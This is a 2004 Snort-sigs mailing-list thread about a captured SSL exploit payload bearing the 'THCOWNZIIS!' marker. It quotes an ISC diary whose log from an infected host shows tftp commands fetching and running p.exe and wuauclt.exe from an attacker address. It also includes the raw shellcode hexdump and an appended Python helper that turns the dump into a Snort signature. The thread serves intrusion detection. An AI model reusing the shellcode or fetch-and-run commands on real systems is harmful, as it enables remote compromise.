[Snort-sigs] do you know what is it ?

Harper, Patrick patrick.harper at ...1819...
Mon Jul 19 10:08:05 EDT 2004


I started seeing these Saturday morning


From
http://www.incidents.org/diary.php?date=2004-07-17&isc=f766f125128a810830df2a66315c9f1a

New Reports of Increased SSL Activity (Thanks to Chris Carboni for
adding this entry) 

We've received several reports of increased SSL activity reminiscent of
activity seen last April after the release of MS04-011. 

Preliminary analysis of Dshield data
(http://isc.sans.org/port_details.php?port=443 ) shows a sharp rise in
activity beginning at some point on 7/15 UDT. 

Data is currently being analyzed to determine if this is a re-hash of
older exploits or if this activity has been generated by either a new
exploit or a variation of older exploits. 
Notice the string "THCOWNZIIS!" in the payload. This resembles the THC
exploit for SSL PCT that was released in April, although it may also be
a new variant. 

We have a reader report that the following was seen on an infected
system: 

Microsoft Windows 2000 [Version 5.00.2195]Microsoft Windows 2000
[Version 5.00.2195]Microsoft Windows 2000 [Version 5.00.2195]{D}{A} 
(C) Copyright 1985-2000 Microsoft Corp.{D}{A} 
{D}{A} 
C:\WINNT\system32 > {A} 
cd ..{D}{A} 
{A} 
cd ..{D}{A} 
{D}{A} 
C:\WINNT > {A} 
tftp -i xx.xx.xx.xx get p.exe{D}{A} 
{A} 
tftp -i xx.xx.xx.xx get p.exe{D}{A} 
Transfer successful: 13824 bytes in 1 second, 13824 bytes/s{D}{D}{A} 
{D}{A} 
C:\WINNT > {A} 
p.exe{D}{A} 
{A} 
p.exe{D}{A} 
{D}{A} 
C:\WINNT > {A} 
tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A} 
{A} 
tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A} 
Transfer successful: 53760 bytes in 4 seconds, 13440 bytes/s{D}{D}{A} 
{D}{A} 
C:\WINNT > {A} 
wuauclt.exe{D}{A} 
{A} 
wuauclt.exe{D}{A} 
{D}{A} 
C:\WINNT > 


If you have a system that has been compromised, please send us a note
with system configuration and patch level. 
 

-----Original Message-----
From: Erik Lalancette [mailto:elalancette at ...2614...] 
Sent: Monday, July 19, 2004 11:06 AM
To: snort-sigs at lists.sourceforge.net
Subject: [Snort-sigs] do you know what is it ?

Hi,
      I received that from someone? 
 
0000  80 62 01 02 bd 00 01 00  01 00 16 8f 82 01 00 00  .b..............
0010  00 eb 0f 54 48 43 4f 57  4e 5a 49 49 53 21 32 5e  ...THCOWNZIIS!2^
0020  be 98 eb 25 23 28 45 49  25 17 02 06 6c 59 6c 59  ...%#(EI%...lYlY
0030  f8 1d 9c de 8c d1 4c 70  d4 03 58 46 57 53 32 5f  ......Lp..XFWS2_
0040  33 32 2e 44 4c 4c 01 eb  05 e8 f9 ff ff ff 5d 83  32.DLL........].
0050  ed 2c 6a 30 59 64 8b 01  8b 40 0c 8b 70 1c ad 8b  .,j0Yd... at ...2639...
0060  78 08 8d 5f 3c 8b 1b 01  fb 8b 5b 78 01 fb 8b 4b  x.._<.....[x...K
0070  1c 01 f9 8b 53 24 01 fa  53 51 52 8b 5b 20 01 fb  ....S$..SQR.[ ..
0080  31 c9 41 31 c0 99 8b 34  8b 01 fe ac 31 c2 d1 e2  1.A1...4....1...
0090  84 c0 75 f7 0f b6 45 09  8d 44 45 08 66 39 10 75  ..u...E..DE.f9.u
00a0  e1 66 31 10 5a 58 5e 56  50 52 2b 4e 10 41 0f b7  .f1.ZX^VPR+N.A..
00b0  0c 4a 8b 04 88 01 f8 0f  b6 4d 09 89 44 8d d8 fe  .J.......M..D...
00c0  4d 09 75 be fe 4d 08 74  17 fe 4d 24 8d 5d 1a 53  M.u..M.t..M$.].S
00d0  ff d0 89 c7 6a 02 58 88  45 09 80 45 79 0c eb 82  ....j.X.E..Ey...
00e0  89 ce 31 db 53 53 53 53  56 46 56 ff d0 89 c7 55  ..1.SSSSVFV....U
00f0  58 66 89 30 6a 10 55 57  ff 55 e0 8d 45 88 50 ff  Xf.0j.UW.U..E.P.
0100  55 e8 55 55 ff 55 ec 8d  44 05 0c 94 53 68 2e 65  U.UU.U..D...Sh.e
0110  78 65 68 5c 63 6d 64 94  31 d2 8d 45 cc 94 57 57  xeh\cmd.1..E..WW
0120  57 53 53 fe ca 01 f2 52  94 8d 45 78 50 8d 45 88  WSS....R..ExP.E.
0130  50 b1 08 53 53 6a 10 fe  ce 52 53 53 53 55 ff 55  P..SSj...RSSSU.U
0140  f0 6a ff ff 55 e4                                   .j..U.
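An added example, not code from either poster: a small Python helper that rebuilds the bytes from a dump in the wrapped layout the list archive produced above (hex row, then the ASCII column on its own line), reports where the strings the ISC diary calls out occur, and renders a marker as a Snort content: clause with anything Snort treats specially hex-escaped. The sample rows are the first two rows of the posted dump; the marker list is an assumption taken from the diary text.

```python
import re

# First two rows of the dump posted in the thread, as the list archive
# rendered them: the hex row, then the ASCII column wrapped onto its own line.
SAMPLE_DUMP = """\
0000  80 62 01 02 bd 00 01 00  01 00 16 8f 82 01 00 00
.b..............
0010  00 eb 0f 54 48 43 4f 57  4e 5a 49 49 53 21 32 5e
...THCOWNZIIS!2^
"""

# A hex row: 4-digit offset, up to 16 byte pairs, then two or more spaces or end
# of line, so an ASCII column that happens to start with hex digits is not eaten.
HEX_ROW = re.compile(r"^([0-9a-f]{4})\s+((?:[0-9a-f]{2}\s+){0,15}[0-9a-f]{2})(?=\s{2,}|\s*$)", re.I)

# Strings the ISC diary points out in this payload (assumed marker list).
MARKERS = [b"THCOWNZIIS!", b"WS2_32.DLL"]

def parse_dump(text):
    """Rebuild raw bytes from a hexdump whose ASCII column may have wrapped."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_ROW.match(line.rstrip())
        if not m:
            continue  # wrapped ASCII text or a blank line
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"row {m.group(1)} does not follow the previous row")
        out += bytes.fromhex(m.group(2))  # fromhex ignores the column spacing
    return bytes(out)

def find_markers(payload):
    """Map each known marker to its byte offset in the payload (absent ones omitted)."""
    return {m.decode(): payload.find(m) for m in MARKERS if m in payload}

def snort_content(pattern):
    """Render bytes as a Snort content: match, hex-escaping what Snort treats specially."""
    parts, hexrun = [], []
    for b in pattern:
        if 0x20 <= b < 0x7F and chr(b) not in '";|\\':
            if hexrun:
                parts.append("|" + " ".join(hexrun) + "|")
                hexrun = []
            parts.append(chr(b))
        else:
            hexrun.append(f"{b:02X}")
    if hexrun:
        parts.append("|" + " ".join(hexrun) + "|")
    return 'content:"' + "".join(parts) + '";'
```

The diary places this traffic on port 443, so the content: clause belongs in a rule for that port; a match on the marker string alone will miss a variant that changes it.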